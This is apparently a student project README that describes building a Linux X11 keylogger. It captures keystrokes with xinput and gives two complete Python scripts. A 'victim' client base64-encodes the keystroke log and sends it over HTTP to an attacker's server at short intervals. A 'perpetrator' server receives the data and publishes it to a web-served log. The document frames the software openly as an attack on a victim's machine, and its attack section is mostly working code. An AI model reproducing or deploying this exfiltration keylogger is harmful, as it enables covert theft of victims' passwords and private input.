# REFLEXION #

### XEV ###

xev do the job of logging key but how put in directly to scan x11 ?

I find a C programme using xev tha do the job [here](https://gist.github.com/robertklep/5124355)

### PYTHON ###
I find on the internet that xinput do the job of logging 

just do : `xinput list` and target your keyboard

for logging : `xinput test 9` if your keyboard is refered to number 9

you can redirect it to a file with : `xinput test 9 > test.log`

and then you can translate this one with [a litle python script](utils/keylogger.py) : `./keylogger.py < test.log`

### SEND LOGS THROUGH SOCKETS ###
In order to differenciate or project with Benjamin Burnouf's one, our project took a other aspect of the question : how to send logs through socket.
We found a keylogger which was almost finished. So we improved it, and create a python client-server script to send logs as http requests.

So in our victim computer, to application run : the keylogger, and the python script which send log via http request each 10 seconds.
On the other side, the python server script permit to the perpretator of the trick to add this to the remote log file.

#### VICTIM SCRIPT ####
```python
from collections import deque
from time import sleep
import signal, sys, argparse, urllib, urllib2, string, random, threading, base64, select, httplib, socket
from Crypto.Cipher import AES

parser = argparse.ArgumentParser()
parser.add_argument('-s','--server', help='Web server IP',required=True)
args = parser.parse_args()
server = args.server

def client_http():
        while 1:
                proxy = urllib2.ProxyHandler({'http': 'proxy.univ-lille1.fr:3128'})
                opener = urllib2.build_opener(proxy)
                urllib2.install_opener(opener)
                params = urllib.urlencode({})
                with open('log', 'r') as fichier:
                        logs = fichier.read()
                open('log', 'w')
                data = base64.b64encode(logs)
                chemin = ''.join(random.choice(string.ascii_uppercase+string.digits) for i in range(10))+".html"
                req = urllib2.Request("http://"+server+":55369/" + chemin  + "?data="+data, params)
                response=urllib2.urlopen(req)
                sleep(5)


# initialisation des variables
http_thread = threading.Thread(target=client_http)<DEL>
http_thread.start()
```

An apache2 server with a javascript script witch reload log file each 20 secondes permit to print log on internet.

#### PERPRETATOR SCRIPT ####
```python
from time import sleep
import socket
import BaseHTTPServer
from collections import deque
import select
import base64
import threading
import os

class handler(BaseHTTPServer.BaseHTTPRequestHandler):
        def do_HEAD(s):
                s.send_response(200)
                s.send_header("Content-type", "text/html")
                s.end_headers()
        def do_GET(s):
                handler.rondoudou(s)
        def do_POST(s):
                handler.rondoudou(s)
        def rondoudou(s):
                data = ''
                if "=" in s.path:
                        data = s.path[s.path.index('=')+1:]
                        with open('/var/www/html/log', 'a') as myfile:
                                myfile.write(base64.b64decode(data))
                s.send_response(200)
                s.send_header("Content-Type", "text/html")
                s.send_header("Content-Lenght", "0")
                s.end_headers()


# initialisation des variables
http_server_info = ('', 55369)
http_server = BaseHTTPServer.HTTPServer(http_server_info, handler)
print 'Web server online'
http_server.serve_forever()
```

# RESULTS #
As result we can say that all logs are send on a remote server on base64 encryption, and are print on a apache2 on internet.